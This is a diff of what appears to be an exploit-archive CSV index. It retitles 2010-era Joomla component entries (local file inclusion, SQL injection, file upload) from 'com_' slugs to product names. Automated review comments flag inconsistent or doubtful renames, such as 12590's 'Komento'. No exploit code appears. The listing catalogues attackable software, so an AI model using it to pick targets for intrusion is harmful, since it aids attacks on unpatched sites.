@ -22821,8 +22826,8 @@ id,file,description,date,author,platform,type,port
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component 'com_javoice' - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
@ -22839,8 +22844,8 @@ id,file,description,date,author,platform,type,port
12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12145,platforms/php/webapps/12145.txt,"Joomla! Component 'com_jfeedback' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12146,platforms/php/webapps/12146.txt,"Joomla! Component 'com_jprojectmanager' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
@ -22850,13 +22855,13 @@ id,file,description,date,author,platform,type,port
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
12159,platforms/php/webapps/12159.txt,"Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0
12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0
12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0
12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
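Review bot: 12159 is renamed to "Multi-Venue Restaurant Menu Manager 1.5.2", but 12162 two rows below is left as "Joomla! Component 'mv_restaurantmenumanager' - SQL Injection". These look like two entries for the same component, and after this change they carry unrelated names, so a search on either name returns only one of them. Retitle 12162 in the same commit or keep the slug on both rows.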
@ -22866,7 +22871,7 @@ id,file,description,date,author,platform,type,port
12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component 'com_market' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
@ -22876,8 +22881,8 @@ id,file,description,date,author,platform,type,port
12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
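Review bot: The unchanged 12185 row at the top of this hunk ends at "Local File", with no vulnerability class completed, unlike the "Local File Inclusion" rows around it. This pass normalises the titles two rows below (12190, 12191) and leaves that one as is. Worth checking 12185.txt and completing the title in the same change.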
@ -22899,17 +22904,17 @@ id,file,description,date,author,platform,type,port
12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12233,platforms/php/webapps/12233.txt,"Joomla! Component 'com_mtfireeagle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12234,platforms/php/webapps/12234.txt,"Joomla! Component 'com_mediamall' - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
@ -22920,7 +22925,7 @@ id,file,description,date,author,platform,type,port
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component 'com_joltcard' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
@ -22931,26 +22936,26 @@ id,file,description,date,author,platform,type,port
12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12286,platforms/php/webapps/12286.txt,"Joomla! Component 'com_matamko' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12287,platforms/php/webapps/12287.txt,"Joomla! Component 'com_multiroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12288,platforms/php/webapps/12288.txt,"Joomla! Component 'com_multimap' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12289,platforms/php/webapps/12289.txt,"Joomla! Component 'com_drawroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko 1.01 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12287,platforms/php/webapps/12287.txt,"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12288,platforms/php/webapps/12288.txt,"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12289,platforms/php/webapps/12289.txt,"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12290,platforms/php/webapps/12290.txt,"Joomla! Component 'com_google' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12291,platforms/php/webapps/12291.txt,"Joomla! Component 'com_if_surfalert' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT 1.2 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0
12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,cr4wl3r,php,webapps,0
12299,platforms/php/webapps/12299.txt,"Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0
12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0
12305,platforms/php/webapps/12305.txt,"Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
12306,platforms/php/webapps/12306.txt,"Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
12305,platforms/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,cr4wl3r,php,webapps,0
12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0
12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12318,platforms/php/webapps/12318.txt,"Joomla! Component 'com_mmsblog' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12318,platforms/php/webapps/12318.txt,"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0
12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0
12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0
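Review bot: The renames in this hunk cover only some rows: 12285 to 12289, 12291, 12299, 12305, 12306 and 12318 get a product name and version, while 12283, 12284, 12290, 12316 and 12317 right beside them keep the quoted 'com_...' form. The new titles also drop the `com_` directory name, which is the string that appears in a request's `option=` parameter and is what people grep web logs and this CSV for. Suggest keeping the identifier next to the display name, for example "Gadget Factory 1.0.0 ('com_gadgetfactory')", and converting the remaining rows in the same pass.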
@ -23010,10 +23015,10 @@ id,file,description,date,author,platform,type,port
12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0
12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0
12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard 1.3 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
@ -23045,7 +23050,7 @@ id,file,description,date,author,platform,type,port
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla! Component 'com_newsfeeds' - SQL Injection",2010-04-30,Archimonde,php,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla! Component Newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0
12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0
12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0
@ -23119,24 +23124,24 @@ id,file,description,date,author,platform,type,port
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0
12590,platforms/php/webapps/12590.txt,"Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
12590,platforms/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
12592,platforms/php/webapps/12592.txt,"Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
12595,platforms/php/webapps/12595.txt,"Joomla! Component 'com_dioneformwizard' - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0
12601,platforms/php/webapps/12601.txt,"Joomla! Component 'com_jejob' 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
12607,platforms/php/webapps/12607.txt,"Joomla! Component 'com_jequoteform' - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0
12607,platforms/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0
12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0
12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0
12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0
12611,platforms/php/webapps/12611.txt,"Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
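Review bot: The new title for 12590 replaces 'com_konsultasi' with "Komento 1.0.0", a name that does not resemble the old identifier, and adds a version the old title did not carry. The other renames in this hunk (JE Job, MS Comment, JE Quotation Form) map visibly onto their `com_` names; this one does not. Please check it against 12590.txt and, if the mapping is correct, keep `com_konsultasi` in the title so the entry stays findable by the identifier.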
@ -23191,7 +23196,7 @@ id,file,description,date,author,platform,type,port
12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
@ -23256,10 +23261,10 @@ id,file,description,date,author,platform,type,port
12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0
@ -23286,7 +23291,7 @@ id,file,description,date,author,platform,type,port
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component JS Jobs 1.0.5.8 - SQL Injection",2010-05-31,d0lc3,php,webapps,0
